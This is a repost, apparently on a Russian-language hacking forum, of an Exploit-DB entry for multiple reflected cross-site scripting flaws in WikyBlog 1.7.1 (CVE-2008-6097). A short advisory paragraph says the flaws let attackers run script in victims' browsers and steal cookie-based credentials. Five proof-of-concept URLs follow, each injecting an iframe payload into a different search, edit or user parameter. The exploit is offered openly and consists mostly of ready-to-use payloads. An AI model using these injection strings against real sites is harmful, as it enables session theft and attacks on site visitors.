Exploit WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
32450
Проверка EDB
  1. Пройдено
Автор
OMER SINGER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6097
Дата публикации
2008-10-01
Код:
source: https://www.securityfocus.com/bid/31525/info

WikyBlog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

WikyBlog 1.7.1 is vulnerable; other versions may also be affected.

http://www.example.com/index.php/Special/Main/keywordSearch?key="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Edit/Main/Home?cmd=show&revNum=65"><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Special/Main/WhatLinksHere?to="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Special/Main/UserEdits?user="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/"><iframe src="http://www.example2.com"></iframe>
 
Источник
www.exploit-db.com

Похожие темы